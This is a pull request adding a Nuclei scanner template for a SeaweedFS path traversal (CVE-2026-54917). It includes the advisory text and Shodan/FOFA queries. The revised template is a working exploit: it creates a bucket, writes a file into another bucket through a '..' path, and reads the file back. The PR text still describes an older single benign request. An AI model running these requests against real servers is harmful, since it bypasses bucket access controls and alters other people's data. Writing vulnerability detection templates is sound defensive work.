### PR TITLE
Add CVE-2026-54917 SeaweedFS path traversal

### DIFF
--- a/http/cves/2026/CVE-2026-54917.yaml
+++ b/http/cves/2026/CVE-2026-54917.yaml
@@ -1,13 +1,13 @@
 id: CVE-2026-54917
 
 info:
-  name: SeaweedFS <= 4.29 - Path Traversal
-  author: Haseeb-1698
+  name: SeaweedFS <= 4.29 - Path Traversal File Write
+  author: Haseeb-1698,DhiyaneshDk
   severity: high
   description: |
-    SeaweedFS versions through 4.29 build the S3 API and Iceberg REST catalog routers with mux.NewRouter().SkipClean(true), which disables URL path cleaning. A `..` segment in the request path therefore survives routing and reaches the handlers unnormalised, so a request such as `GET /bucket-A/../evil-bucket/key` is matched as bucket=bucket-A with object=../evil-bucket/key. The captured object key is then joined into a filer path where the `..` is collapsed server-side, so the read or write lands in evil-bucket while authorisation is evaluated against bucket-A, enabling cross-bucket access.
+    SeaweedFS versions through 4.29 build the S3 API and Iceberg REST catalog routers with mux.NewRouter().SkipClean(true), which disables URL path cleaning. A `..` segment in the request path therefore survives routing and reaches the handlers unnormalised, so a request such as `PUT /bucket-A/../evil-bucket/key` is matched as bucket=bucket-A with object=../evil-bucket/key. The captured object key is then joined into a filer path where the `..` is collapsed server-side, so the write lands in evil-bucket while authorisation is evaluated against bucket-A, enabling cross-bucket file write.
   impact: |
-    An unauthenticated attacker can read or write objects in buckets other than the one named in the request path, bypassing bucket-level access controls.
+    An unauthenticated attacker can write objects to buckets other than the one named in the request path, bypassing bucket-level access controls.
   remediation: |
     Upgrade to SeaweedFS 4.30 or later.
   reference:
@@ -23,23 +23,39 @@ info:
     cwe-id: CWE-22
   metadata:
     verified: true
-    max-request: 1
+    max-request: 3
     vendor: seaweedfs
     product: seaweedfs
     shodan-query: server:"SeaweedFS"
     fofa-query: server="SeaweedFS"
   tags: cve,cve2026,seaweedfs,traversal
 
+variables:
+  bucket_a: "{{to_lower(rand_base(8))}}"
+  bucket_b: "{{to_lower(rand_base(8))}}"
+  file_key: "{{to_lower(rand_base(8))}}"
+
 http:
-  - method: GET
-    path:
-      - "{{BaseURL}}/{{randstr}}/../{{randstr}}/{{randstr}}"
+  - raw:
+      - |
+        PUT /{{bucket_a}} HTTP/1.1
+        Host: {{Hostname}}
+        Content-Length: 0
+      - |
+        PUT /{{bucket_a}}/../{{bucket_b}}/{{file_key}} HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: text/plain
+        Content-Length: {{len(file_key)}}
+
+        {{file_key}}
+      - |
+        GET /{{bucket_b}}/{{file_key}} HTTP/1.1
+        Host: {{Hostname}}
 
     matchers:
       - type: dsl
         dsl:
-          - "contains_all(body, 'NoSuchBucket', '<Key>../')"
-          - "contains(header, 'SeaweedFS')"
-          - "contains(header, 'application/xml')"
-          - "status_code == 404"
+          - "status_code_3 == 200"
+          - "contains(body_3, file_key)"
+          - "contains(header_3, 'SeaweedFS')"
         condition: and

--- a/http/cves/2026/CVE-2026-54917.yaml
+++ b/http/cves/2026/CVE-2026-54917.yaml
@@ -1,0 +1,45 @@
+id: CVE-2026-54917
+
+info:
+  name: SeaweedFS <= 4.29 - Path Traversal
+  author: Haseeb-1698
+  severity: high
+  description: |
+    SeaweedFS versions through 4.29 build the S3 API and Iceberg REST catalog routers with mux.NewRouter().SkipClean(true), which disables URL path cleaning. A `..` segment in the request path therefore survives routing and reaches the handlers unnormalised, so a request such as `GET /bucket-A/../evil-bucket/key` is matched as bucket=bucket-A with object=../evil-bucket/key. The captured object key is then joined into a filer path where the `..` is collapsed server-side, so the read or write lands in evil-bucket while authorisation is evaluated against bucket-A, enabling cross-bucket access.
+  impact: |
+    An unauthenticated attacker can read or write objects in buckets other than the one named in the request path, bypassing bucket-level access controls.
+  remediation: |
+    Upgrade to SeaweedFS 4.30 or later.
+  reference:
+    - https://github.com/advisories/GHSA-w62w-66v9-vvgv
+    - https://github.com/seaweedfs/seaweedfs/commit/dd1b4287899eed3dfd73c2f3b1de001996fda229
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-54917
+  classification:
+    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:N/SC:H/SI:H/SA:N
+    cvss-score: 7.8
+    cve-id: CVE-2026-54917
+    epss-score: 0.00385
+    epss-percentile: 0.31814
+    cwe-id: CWE-22
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: seaweedfs
+    product: seaweedfs
+    shodan-query: server:"SeaweedFS"
+    fofa-query: server="SeaweedFS"
+  tags: cve,cve2026,seaweedfs,traversal
+
+http:
+  - method: GET
+    path:
+      - "{{BaseURL}}/{{randstr}}/../{{randstr}}/{{randstr}}"
+
+    matchers:
+      - type: dsl
+        dsl:
+          - "contains_all(body, 'NoSuchBucket', '<Key>../')"
+          - "contains(header, 'SeaweedFS')"
+          - "contains(header, 'application/xml')"
+          - "status_code == 404"
+        condition: and


### PR DESCRIPTION
### PR Information

- Added CVE-2026-54917
- References:
  - https://github.com/advisories/GHSA-w62w-66v9-vvgv
  - https://github.com/seaweedfs/seaweedfs/commit/dd1b4287899eed3dfd73c2f3b1de001996fda229
  - https://nvd.nist.gov/vuln/detail/CVE-2026-54917

### Template validation

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [x] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details (leave it blank if not applicable)

Validated locally with Docker only; no third-party targets were tested.

- Vulnerable image: `chrislusf/seaweedfs:4.29` (`sha256:d47c7ee9...`)
- Patched image: `chrislusf/seaweedfs:4.30` (`sha256:20fb6eab...`)
- Nuclei version: `v3.11.1`
- `nuclei -validate`: passed
- Vulnerable run: one match
- Patched run: zero matches

SeaweedFS through 4.29 builds the S3 and Iceberg routers with
`SkipClean(true)`, so a `..` segment survives routing and reaches the
handlers unnormalised. The template sends a single benign request with a `..`
segment and matches when the server echoes the uncleaned key back in the
`NoSuchBucket` error. On 4.30 the `validateRequestPath` middleware added in
dd1b428 rejects the request with `400 InvalidRequest`, so the template does
not match.

Note on scoring: NVD carries two metrics for this CVE — CVSS 4.0 7.8 HIGH
(GitHub/CNA, secondary) and CVSS 3.1 10.0 CRITICAL (NVD, primary). I used the
CNA's 4.0 vector to match recent 2026 templates; happy to switch to the 3.1
primary if you prefer.
